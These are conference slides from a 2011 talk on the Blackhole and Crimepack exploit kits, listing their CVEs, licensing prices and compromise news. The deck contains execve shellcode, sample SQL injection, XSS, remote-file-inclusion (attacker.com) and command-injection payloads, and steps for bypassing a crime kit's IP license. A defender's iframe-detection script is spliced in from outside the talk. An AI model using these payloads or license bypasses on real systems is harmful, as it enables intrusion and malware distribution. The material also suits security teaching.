ClubHack 2011 Hacking and Security Conference. Talk: Exploit the Exploit Kits. Speaker: Dhruv Soi
© Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited http://hacker.do
Exploit The Exploit Kits
Presented By:
Dhruv Soi
Chief Mentor @ Hacker Distinct Objects, Director @ Torrid Networks, Chair @ OWASP India
Disclaimer
Agenda
#whoami Segmentation Fault
#./exploit –mode Basics AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
#history; lastlog ummm
#watch ‘demo –kits blackhole crimepack’ Boom!
#make –bypass License Oops!
#shutdown -r now “Questions?“ Thank You
Who am I?
Chief Mentor – HDO, Founder – Torrid Networks, Chair – OWASP India
Past Experience – Fidelity Investments, Tech Mahindra (iPolicy), Sopra Group, FCS
Speaker – NASSCOM, DSCI, CII, OWASP India, OWASP Taiwan, OWASP Portugal
Author – Linux For You, Benefit, IT Magazine, HNS, SearchSecurity
Expertise – None. Only passionate about InfoSec, just another learner!
Organizer for OWASP Asia 2009 – Director - NTRO, CBI Director, US – White House Cyber Czar, Ex-CIA Director invited as Chief Guest
OWASP 2012 – Be Ready!
Basics of Exploitation
Art of Exploitation
Vulnerability to Exploitation
Practical Exploitation
Software Vulnerabilities @ Glance
Buffer Overflow
Format String
Code/File Injection
Privilege Escalation
Denial of Service
10
global code_start
global code_end
.data
code_start:
    jmp 0x17                 # jump forward to the call (relative offsets kept as on the slide)
    popl %esi                # %esi = address of the "/bin/shX" string pushed by the call
    movl %esi,0x8(%esi)      # argv[0] = pointer to "/bin/sh", stored right after the string
    xorl %eax,%eax           # %eax = 0 without embedding a NUL byte in the code
    movb %al,0x7(%esi)       # overwrite the trailing 'X' with a NUL terminator (movb needs %al, not %eax)
    movl %eax,0xc(%esi)      # argv[1] = NULL
my_execve:
    movb $0xb,%al            # syscall 11 = execve on 32-bit Linux
    movl %esi,%ebx           # %ebx = filename
    leal 0x8(%esi),%ecx      # %ecx = argv
    xorl %edx,%edx           # %edx = envp = NULL
    int $0x80
    call -0x1c               # back to popl; the call pushes the string address as its return address
    .string "/bin/shX"
code_end:
Application Vulnerabilities @ Glance
SQL Injection ‘ OR 1=1--
Cross Site Scripting <script>alert(“Hello”)</script>
File Inclusion /index.php?page=http://www.attacker.com/attack.txt
Command Injection /lookup.php|dir c:
Session Hijack
Traditional Attack Scenario
Identify Target
Port Scan
Vulnerability Identification
Exploit
Privilege Elevation
Access Resources
Replicate to other targets (worms)
Attack Challenges
Identifying a user who is not directly on the internet (no public/static IP address)?
LAN Users
Attacking a user behind Firewall
Network Firewalls
Host based Firewalls
Patched Machines, Latest Exploits (0-Days)
Antivirus
Too much manual work - Time is money!
From Servers to Client
Identify user from social networks, search engines, emails, address book, logs or behavior
Target client-side attacks:
Browser based (Mozilla, IE, Safari, etc.)
Adobe Reader
Adobe Flash
Sun Java
Media Players
User needs to click the URL pointing to the hosted exploit:
Send email
Insert it into their favorite website
Client Side Vulnerabilities - Metasploit
Microsoft Windows WebDAV Application DLL Hijacker
Apple QuickTime 7.6.7 _Marshaled_pUnk Code Execution
Microsoft Windows Shell LNK Code Execution (MS10-046)
Microsoft Help Center XSS and Command Execution (MS10-042)
Microsoft Internet Explorer iepeers.dll Use After Free (MS10-018)
Microsoft Internet Explorer Tabular Data Control Exploit (MS10-018)
Microsoft Internet Explorer "Aurora" Memory Corruption (MS10-002)
Firefox 3.5 escape Return Value Memory Corruption
Adobe PDF Embedded EXE Social Engineering
Firefox location.QueryInterface() Code Execution
Mozilla Suite/Firefox InstallVersion->compareTo() Code Execution
Mozilla Suite/Firefox Navigator Object Code Execution
Adobe Collab.getIcon() Buffer Overflow
Adobe Collab.collectEmailInfo() Buffer Overflow
Adobe Flash Player "newfunction" Invalid Pointer Use
Adobe Flash Player "Button" Remote Code Execution
Sun Java Calendar Deserialization Exploit
Sun Java JRE getSoundbank file:// URI Buffer Overflow
Sun Java JRE AWT setDiffICM Buffer Overflow
Too many exploits, too little time!
Java Rhino
CVE-2011-3544 : Java Applet Rhino Script Engine Remote Code Execution
Demonstration Time…
Source: https://community.rapid7.com/community/metasploit/blog/2011/11/30/test-results-for-javarhino
Exploit Kits
PHP, MySQL, list of exploits, obfuscated code
Centralized console – dashboards
Generates an iFrame
Sends exploits automatically to the victim's browser when it visits the website (via the iFrame)
Pushes the payload (bot, trojan, keylogger) to the victim's machine on successful exploitation
Records the stats
OOPS! Antivirus evasion, scanning
All automated – sometimes it's good to be lazy!
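A defender-side check for the iFrame delivery step described above, as an added example that is not part of the talk or of any kit: it parses a page and reports iframes that are both off-site and hidden (tiny or styled invisible), the pattern left on compromised sites that redirect visitors to a kit landing page. The sample HTML is constructed, and the site hostname passed in is an assumed input.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page: one legitimate iframe plus an injected 1x1 hidden
# iframe that pulls an off-site landing page, the way the kits described above
# bring victims to their exploit page. 203.0.113.7 is a documentation-range
# placeholder, not a real indicator.
SAMPLE_HTML = """<html><body><h1>Welcome</h1>
<iframe src="/embed/video.html" width="640" height="360"></iframe>
<iframe src="http://203.0.113.7/in.php" width="1" height="1"
        style="visibility:hidden"></iframe>
</body></html>"""

class IframeCollector(HTMLParser):
    """Collects the attributes of every <iframe> on the page."""
    def __init__(self):
        super().__init__()
        self.iframes = []
    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append(dict(attrs))

def _tiny(value):
    """True for a width/height of 2px or less, the classic hidden-iframe size."""
    try:
        return int(str(value).lower().rstrip("px")) <= 2
    except ValueError:
        return False

def find_injected_iframes(html, site_host):
    """Return src values of iframes that are both off-site and hidden.

    site_host is the hostname of the page being scanned (assumed input);
    same-origin or relative iframes are not reported.
    """
    collector = IframeCollector()
    collector.feed(html)
    hits = []
    for a in collector.iframes:
        src = a.get("src") or ""
        style = (a.get("style") or "").replace(" ", "").lower()
        host = urlparse(src).hostname
        off_site = host is not None and host != site_host
        hidden = (_tiny(a.get("width")) or _tiny(a.get("height"))
                  or "hidden" in style or "display:none" in style)
        if off_site and hidden:
            hits.append(src)
    return hits
```

Run against fetched copies of your own pages (or a web proxy's HTML log) and alert on any hit; a legitimate third-party widget is almost never both off-site and sized 1x1.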
Blackhole & Crimepack
Blackhole Exploits
Internet Explorer
CVE-2010-1885 IE HCP
CVE-2006-0003 IE MDAC
Adobe Software
CVE-2008-2992 Adobe Reader util.printf
CVE-2009-0927 Adobe Reader Collab GetIcon
CVE-2007-5659 Adobe Reader CollectEmailInfo
Java Software
CVE-2009-1671 Java buffer overflows in the Deployment Toolkit ActiveX control in deploytk.dll
CVE-2010-0840 Java Trusted Methods Chaining Remote Code Execution Vulnerability
CVE-2010-0842 Java JRE MixerSequencer Invalid Array Index Remote Code Execution Vulnerability
CVE-2010-0886 Java unspecified vulnerability in the Java Deployment Toolkit component in Oracle Java SE
CVE-2010-1423 Java argument injection vulnerability in the URI handler in the Java NPAPI plugin
Crimepack Exploits
name="mdac" desc="IE6 COM CreateObject Code Execution" CVE-2006-0003
name="msiemc" desc="IE7 Uninitialized Memory Corruption" CVE-2010-0806
name="java" desc="JRE getSoundBank Stack BOF" CVE-2009-3867
name="iepeers" desc="IEPeers Remote Code Execution" CVE-2010-0806
name="pdfexpl" desc="PDF Exploits [collectEmailInfo (CVE-2007-5659), getIcon (CVE-2009-0927), util.printf (CVE-2008-2992)]"
name="opera" desc="Opera TN3270" CVE-2009-3269
name="aol" desc="AOL Radio AmpX Buffer Overflow" CVE-2007-5755
name="iexml" desc="Internet Explorer 7 XML Exploit" CVE-2008-4844
name="firefoxdiffer" desc="Firefox 3.5/1.4/1.5 exploits" CVE-2009-355
name="libtiff" desc="Adobe Acrobat LibTIFF Integer Overflow" CVE-2010-0188
name="spreadsheet" desc="OWC Spreadsheet Memory Corruption" CVE-2009-1136
name="activexbundle" desc="Bundle of ActiveX exploits" CVE-2008-2463
Crimepack
Blackhole, hick hick!
Whew! Demonstration Time...
Exploit Kits in News
November 2, 2011: Blackhole Exploit Kit attack on WampServer & Wordpress sites
October 13, 2011: Approximately 16,000 compromised pages are redirecting users to the site that's hosting the Nice Pack exploit kit
September 27, 2011: MySQL.com hacked to serve malware
May 17, 2011: Geek.com Site Hacked Via Blackhole Exploit Kit
April 11, 2011: US Postal Service (USPS.gov) website victim of Blackhole exploit kit
May 05, 2010: U.S. Treasury Website Hacked Using Exploit Kit
There are just too many of those….
Data Leakage, Even Exploit Kits!
May 22, 2011: First Public Release of BlackHole Exploit Kit!
May 14, 2011: Crimepack 3.1.3 Exploit kit Leaked, available for Download!
May 13, 2011: 26 Underground Hacking Exploit Kit available for Download!
April 14, 2011: Phoenix exploit kit 2.5 leaked, Download Now!
Managed Hacking Services
Blackhole deal – I ain't their marketing guy!
Annual license: $ 1500
Half-year license: $ 1000
3-month license: $ 700
Update FUD $ 50
Changing domain: $ 20; multidomain license: $ 200.
During the term of the license all the updates are free.
Rent on Blackhole servers:
• 1 week (7 full days): $ 200
• 2 weeks (14 full days): $ 300
• 3 weeks (21 full days): $ 400
• 4 weeks (31 full days): $ 500
• 24-hour test: $ 50
Obfuscated Code…
Bypass License
The license is bound to a public IP (IP1): the kit checks the IP from the HTTP headers and grants access only for that address
How about configuring your server with the IP address the kit is licensed to? Routing issues?
Configure your own public IP (IP2) on eth0 and the exploit kit's licensed public IP (IP1) on eth1
Configure an Apache VirtualHost on IP1:80 with the exploit kit path
Configure an Apache VirtualHost on IP2:80 with the mod_proxy module
Configure Apache mod_proxy to forward requests from IP2:80 to IP1:80
The kit thinks its license is in use, since the requests are arriving at IP1
Protecting from Exploit Kits?
Out of Scope for now!
We are hiring!
Malware Writers
Exploit Writers
InfoSec Trainers Onsite
Opportunity in South Africa
Questions?
SANTA